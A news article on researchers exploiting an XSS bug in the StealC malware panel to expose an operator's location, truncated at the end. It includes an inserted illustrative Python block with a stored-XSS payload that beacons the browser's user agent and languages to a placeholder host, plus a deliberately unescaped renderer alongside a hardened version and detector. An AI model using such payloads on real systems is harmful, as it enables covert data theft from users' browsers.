Cyber: Security Bug In Stealc Malware Panel Let Researchers Spy On Threat...
Cybersecurity researchers have disclosed a cross-site scripting (XSS) vulnerability in the web-based control panel used by operators of the StealC information stealer, allowing them to gather crucial insights on one of the threat actors using the malware in their operations.
StealC is an information stealer that first emerged in January 2023 under a malware-as-a-service (MaaS) model. One of its customers has used YouTube as the primary distribution mechanism, in a phenomenon called the YouTube Ghost Network, disguising the malicious program as cracks for popular software.
Over the past year, the stealer has also been observed being propagated via rogue Blender Foundation files and a social engineering tactic known as FileFix. StealC, in the meantime, received updates of its own, offering Telegram bot integration for sending notifications, enhanced payload delivery, and a redesigned panel. The updated version was codenamed StealC V2.
The exact details of the XSS flaw in the panel have not been disclosed, both to keep the developers from plugging the hole and to avoid helping copycats who might use the leaked panel to start their own stealer MaaS offerings.
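Because the actual flaw is undisclosed, the following is an added, generic illustration of the bug class the researchers describe, not code from StealC or from the article. A stealer panel is a web application whose inputs come from infected hosts, so any field a bot reports (hostname, window title, country) is attacker-controlled from the operator's point of view; a researcher who can submit a fake check-in can plant a stored XSS payload that executes in the operator's browser and beacons back exactly the kind of data the article mentions (user agent, language settings, and the real client IP if the operator is not behind a VPN). The check-in records, the `canary.invalid` beacon host, the `/c?ua=…&lang=…` query format, and the access-log lines are all constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample check-ins as a stealer bot might submit them. The second
# hostname is a stored-XSS payload: when the operator views the log listing it
# makes the operator's browser fetch a researcher-controlled canary URL.
XSS_HOSTNAME = (
    '<img src=x onerror="fetch(\'//canary.invalid/c?ua=\''
    '+encodeURIComponent(navigator.userAgent)'
    '+\'&lang=\'+encodeURIComponent(navigator.languages.join(\',\')))">'
)
SAMPLE_CHECKINS = [
    {"bot_id": "a1f3", "hostname": "DESKTOP-7Q2K", "country": "DE"},
    {"bot_id": "b7c9", "hostname": XSS_HOSTNAME, "country": "US"},
]


def render_vulnerable(checkins):
    """Panel-style log table that interpolates bot-supplied fields verbatim."""
    rows = "".join(
        f"<tr><td>{c['bot_id']}</td><td>{c['hostname']}</td><td>{c['country']}</td></tr>"
        for c in checkins
    )
    return f"<table>{rows}</table>"


def render_hardened(checkins):
    """Same table, but every bot-supplied field is HTML-escaped on output."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(str(c["bot_id"]), quote=True),
            html.escape(str(c["hostname"]), quote=True),
            html.escape(str(c["country"]), quote=True),
        )
        for c in checkins
    )
    return f"<table>{rows}</table>"


# Any tag that is not part of the table skeleton means bot data became markup.
FOREIGN_TAG_RE = re.compile(r"<(?!/?(?:table|tr|td)\b)")


def contains_live_markup(rendered):
    """True if something other than the panel's own table tags survived as HTML."""
    return FOREIGN_TAG_RE.search(rendered) is not None


# Constructed access-log lines from the hypothetical canary host, in the
# common/combined log format. The client IP is whatever the operator's browser
# connected from, which is the detail a forgotten VPN exposes.
SAMPLE_BEACON_LOG = [
    '203.0.113.7 - - [14/Jul/2025:21:03:10 +0000] "GET /c?ua=Mozilla%2F5.0%20'
    '(Macintosh%3B%20Intel%20Mac%20OS%20X%2010_15_7)&lang=en-US%2Cru HTTP/1.1" 204 0 "-" "-"',
    '198.51.100.23 - - [15/Jul/2025:08:41:02 +0000] "GET /c?ua=Mozilla%2F5.0%20'
    '(Macintosh%3B%20Intel%20Mac%20OS%20X%2010_15_7)&lang=en-US%2Cru HTTP/1.1" 204 0 "-" "-"',
    "garbage line that does not parse",
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def summarize_beacons(log_lines):
    """Map each beaconing client IP to the (user agent, languages) pairs it reported."""
    seen = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines instead of failing the whole run
        qs = parse_qs(urlsplit(m["path"]).query)
        ua = qs.get("ua", [""])[0]
        lang = qs.get("lang", [""])[0]
        seen.setdefault(m["ip"], set()).add((ua, lang))
    return seen


if __name__ == "__main__":
    print("vulnerable render executes payload:", contains_live_markup(render_vulnerable(SAMPLE_CHECKINS)))
    print("hardened render executes payload:", contains_live_markup(render_hardened(SAMPLE_CHECKINS)))
    for ip, fingerprints in summarize_beacons(SAMPLE_BEACON_LOG).items():
        print(ip, sorted(fingerprints))
```

Output escaping is the minimum fix for the panel; a real hardening pass would also add a Content-Security-Policy that forbids inline script and restricts `connect-src`, so that even an escaping miss cannot beacon out. For the defender side, the point is that a C2 panel's threat model must treat its own bots as hostile input.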
It's suspected that the stealer's own infections have enabled the threat actor, tracked as YouTubeTA, to seize control of legitimate YouTube accounts and use them to promote more cracked software, creating a self-perpetuating propagation mechanism. There is also evidence of ClickFix-like fake CAPTCHA lures being used to distribute StealC, suggesting the infections aren't confined to YouTube.
Further analysis has determined that the panel enables operators to create multiple users and differentiate between admin users and regular users. In the case of YouTubeTA, the panel has been found to feature only one admin user, who is said to be using an Apple M3 processor-based machine with English and Russian language settings.
In what can be described as an operational security blunder on the threat actor's part, their location was exposed around mid-July 2025 when the threat actor forgot to connect to the StealC panel through a virtual private network (VPN). This revealed their real IP address, which was associated with a Ukrainian provider called TRK Cable TV. The findings indicate that YouTubeTA is a lone-wolf actor operating from an Eastern European country where Russian is commonly spoken.
The research also underscores the impact of the MaaS ecosystem, which empowers threat actors to mount at scale within a
Source: The Hacker News